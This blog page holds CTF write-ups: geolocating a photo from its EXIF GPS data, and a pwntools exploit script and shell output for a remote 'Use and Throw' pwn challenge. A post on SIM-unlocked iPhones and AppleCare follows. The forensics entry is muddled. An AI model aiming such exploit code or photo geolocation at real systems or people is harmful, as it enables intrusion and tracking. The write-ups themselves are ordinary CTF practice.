読者です 読者をやめる 読者になる 読者になる

DoubleS1405 CTF 2017 Writeup

CTF

DoubleS1405 CTF 2017にHarekazeとして参加しました。 チームの総得点は881点でした。

 [Misc 1]Mic Check

Problem

flag{W3lc0me_T0_DoubleS1405_CTF!}

FLAG: W3lc0me_T0_DoubleS1405_CTF!

[Misc 50] Instead of 5 billion won, I give you a cute handcuffs.

Problem 

In the fall of 2016, an e-mail arrived to detective Kim, who is tracking up economic fugitives who have shed large amounts of money from a large corporation.
I know the location of the perpetrator, but I can not tell you, and if you pay me 5 billion, I was attached with a photograph that would tell you the exact location.
The attached photo was taken nearest to his refuge.
Can Kim find out where the shooter escaped?
(The correct answer is the address in Korea. Example: 52-3, Yeonsan-dong, Yeonje-gu, Busan, Republic of Korea)

—- File Info —-

ctf% exiftool 1.JPG
ExifTool Version Number         : 10.40
File Name                       : 1.JPG
Directory                       : .
File Size                       : 5.1 MB
File Modification Date/Time     : 2017:03:25 12:50:02+09:00
File Access Date/Time           : 2017:03:25 12:51:43+09:00
File Inode Change Date/Time     : 2017:03:25 12:50:10+09:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Make                            : Apple
Camera Model Name               : iPhone 6s
Orientation                     : Rotate 180
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : 9.3.2
Modify Date                     : 2016:11:06 13:50:52
Y Cb Cr Positioning             : Centered
Exposure Time                   : 1/120
F Number                        : 2.2
Exposure Program                : Program AE
ISO                             : 40
Exif Version                    : 0221
Date/Time Original              : 2016:11:06 13:50:52
Create Date                     : 2016:11:06 13:50:52
Components Configuration        : Y, Cb, Cr, -
Shutter Speed Value             : 1/120
Aperture Value                  : 2.2
Brightness Value                : 5.751730959
Exposure Compensation           : 0
Metering Mode                   : Multi-segment
Flash                           : Off, Did not fire
Focal Length                    : 4.2 mm
Subject Area                    : 2015 1511 2217 1330
Run Time Flags                  : Valid
Run Time Value                  : 8415890928500
Run Time Epoch                  : 0
Run Time Scale                  : 1000000000
Acceleration Vector             : 0.9942806863 0.02069931851 -0.1201243357
Sub Sec Time Original           : 027
Sub Sec Time Digitized          : 027
Flashpix Version                : 0100
Color Space                     : sRGB
Exif Image Width                : 4032
Exif Image Height               : 3024
Sensing Method                  : One-chip color area
Scene Type                      : Directly photographed
Exposure Mode                   : Auto
White Balance                   : Auto
Focal Length In 35mm Format     : 29 mm
Scene Capture Type              : Standard
Lens Info                       : 4.15mm f/2.2
Lens Make                       : Apple
Lens Model                      : iPhone 6s back camera 4.15mm f/2.2
GPS Latitude Ref                : North
GPS Longitude Ref               : East
GPS Altitude Ref                : Above Sea Level
GPS Time Stamp                  : 04:50:51
GPS Speed Ref                   : km/h
GPS Speed                       : 0
GPS Img Direction Ref           : True North
GPS Img Direction               : 115.244898
GPS Dest Bearing Ref            : True North
GPS Dest Bearing                : 115.244898
GPS Date Stamp                  : 2016:11:06
GPS Horizontal Positioning Error: 10 m
Compression                     : JPEG (old-style)
Thumbnail Offset                : 2014
Thumbnail Length                : 14110
Image Width                     : 4032
Image Height                    : 3024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Aperture                        : 2.2
GPS Altitude                    : 95.3 m Above Sea Level
GPS Date/Time                   : 2016:11:06 04:50:51Z
GPS Latitude                    : 37 deg 40' 11.91" N
GPS Longitude                   : 127 deg 0' 29.88" E
GPS Position                    : 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
Image Size                      : 4032x3024
Megapixels                      : 12.2
Run Time Since Power Up         : 2:20:15
Scale Factor To 35 mm Equivalent: 7.0
Shutter Speed                   : 1/120
Create Date                     : 2016:11:06 13:50:52.027
Date/Time Original              : 2016:11:06 13:50:52.027
Thumbnail Image                 : (Binary data 14110 bytes, use -b option to extract)
Circle Of Confusion             : 0.004 mm
Field Of View                   : 63.7 deg
Focal Length                    : 4.2 mm (35 mm equivalent: 29.0 mm)
Hyperfocal Distance             : 1.82 m
Light Value                     : 10.5

Investigation

GPS Position: 37 deg 40' 11.91" N, 127 deg 0' 29.88" E
が残っていたのでGoogle Maps等に入れてみます。
競技中は
(The correct answer is the address in Korea.
Example: 대한민국 부산광역시 ~~구 ~~동 37-21)
だったので辛かった。

238-1 Ui-dong, Gangbuk-gu, Seoul, South Korea
대한민국 서울 강북구 우동 238-1
ここまでやったのですが、solvedしなかったので悩んでいたら
st98さんがハングルの地名の表記を直してくれて、solvedしてくれました.

FLAG: 대한민국 서울특별시 강북구 우이동 238-1  

www.geoimgr.com Google マップ

Xiomara CTF 2017 Write-up

CTF

Xiomara CTF 2017にHarekazeとして参加しました。 得点は1576点で15位/333でした。

 [Pwning 50] Use and Throw

Problem

I seem to have access to an old server. Can you get me something out of it?
I mean, I am not expecting much but something'd be really great. Anything goes. 
nc 139.59.61.220 12345
pwn50


ctf% nc 139.59.61.220 12345
[1] Register
[2] Report admin
[3] Save Data to server
[4] Delete user
[5] Exit
Enter your choice:3
Sending ur information to server ..

Investigation

ctf% file pwn50
pwn50: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, 
BuildID[sha1]=e6a8871ec4d1215bf32e26a73b3fd7a6611a9710, not stripped 

ctf% checksec pwn50
[*] '/Users/CTF/2017/xiomaractf/pwn50'
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

gdb-peda$ p/x &fetch_flag
$1 = 0x804868b

Exploit

ctf% python solve.py
[+] Opening connection to 139.59.61.220 on port 12345: Done
[*] Switching to interactive mode
Sending ur information to server ...
$ ls -ll    
total 88    
drwxr-xr-x   2 root root  4096 Feb 23 22:15 bin    
drwxr-xr-x   3 root root  4096 Feb 24 01:32 boot    
drwxr-xr-x  17 root root  3880 Feb 23 15:12 dev    
drwxr-xr-x 100 root root  4096 Feb 26 05:55 etc    
drwxr-xr-x  10 root root  4096 Feb 26 05:39 home    
lrwxrwxrwx   1 root root    32 Feb 24 01:32 initrd.img -> boot/initrd.img-4.4.0-64-generic    
lrwxrwxrwx   1 root root    32 Feb  4 17:24 initrd.img.old -> boot/initrd.img-4.4.0-62-generic    
drwxr-xr-x  22 root root  4096 Feb 24 17:26 lib    
drwxr-xr-x   2 root root  4096 Feb 24 18:34 lib32    
drwxr-xr-x   2 root root  4096 Feb  4 17:23 lib64    
drwxr-xr-x   2 root root  4096 Feb 24 18:34 libx32    
drwx------   2 root root 16384 Feb  4 17:33 lost+found    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 media    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 mnt    
drwxr-xr-x   2 root root  4096 Feb  4 17:22 opt    
dr-xr-xr-x 226 root root     0 Feb 23 15:12 proc    
drwx------   6 root root  4096 Feb 26 04:17 root    
drwxr-xr-x  26 root root  1100 Feb 26 05:56 run    
drwxr-xr-x   2 root root  4096 Feb  4 17:25 sbin    
drwxr-xr-x   2 root root  4096 Jan 14 15:06 snap    
drwxr-xr-x   3 root root  4096 Feb 23 15:37 srv    
dr-xr-xr-x  13 root root     0 Feb 25 10:36 sys    
drwx-wx-wt  17 root root  4096 Feb 26 06:47 tmp    
drwxr-xr-x  12 root root  4096 Feb 24 18:34 usr    
drwxr-xr-x  14 root root  4096 Feb 23 15:23 var    
lrwxrwxrwx   1 root root    29 Feb 24 01:32 vmlinuz -> boot/vmlinuz-4.4.0-64-generic    
lrwxrwxrwx   1 root root    29 Feb  4 17:24 vmlinuz.old -> boot/vmlinuz-4.4.0-62-generic    
$ cd home/pwn1
$ ls
flag.txt
pwn1
$ less flag.txt
xiomara{u$3_m3_n0t_wh3n_y0u_ar3_n0t_bu$y_buT_fr33}

FLAG: xiomara{u$3_m3_n0t_wh3n_y0u_ar3_n0t_bu$y_buT_fr33}

[Forensics & Network 100] (not) Guilty Boyfriend

Problem

My girlfriend is out of town and I found her memory card. Time to dig in, suckaaa. 
DD file

Do the Buffer Overflow. After that, get lulz_sec/flag.png LSB and show flag ex:)less flag.txt

(I am modifing experiment exploit code for public. Sorry to late.)

FLAG: xiomara{i_am_lord_of_hacker}

— Code —

from pwn import *
# s = process('./pwn50')
s = remote('139.59.61.220', 12345)

s.recvuntil('choice:')
s.sendline('1')
s.recvuntil('username:')
s.sendline('AAAA')
s.recvuntil('password:')
s.sendline('BBBB')

s.recvuntil('choice:')
s.sendline('4')

s.recvuntil('choice:')
s.sendline('2')
time.sleep(.5)
s.sendline(p32(0x804868b))

s.recvuntil('choice:')
s.sendline('3')

s.interactive()```

SIMロック解除済みのiPhone等をAppleCareで修理や交換をした場合

iOS

 

hiww.hatenablog.com

 以前、キャリア版のSIMロック解除済みiPhoneについて記載しましたが、約1年でAppleの対応がしっかりしてきたのでメモとして残しておきます。

 

SIMロック解除済みのiPhoneiPadAppleCareで修理や交換をした場合

以前の使用端末のアクティベーション状態(SIMロックの有無等)を引き継ぐ事でSIMロック解除の状態のままで新品に交換することができます。

 

checkcoverage.apple.com

キャリアの保険の場合やiPhone以外の端末のSIMロック解除の場合

SIMロック解除の件について各キャリアの店舗などに足を運んで相談する方が確実です。その点、AppleCareはチャットや電話での対応のみで済むので時間の節約にもなりますね。(受付終了時刻が少し早いのが残念ですが...)

感想

キャリアによるSIMロック解除が可能になった際はAppleの対応が明確になってなかったですが数カ月でここまでちゃんと対応できるようになっていたので非常に感心致しました。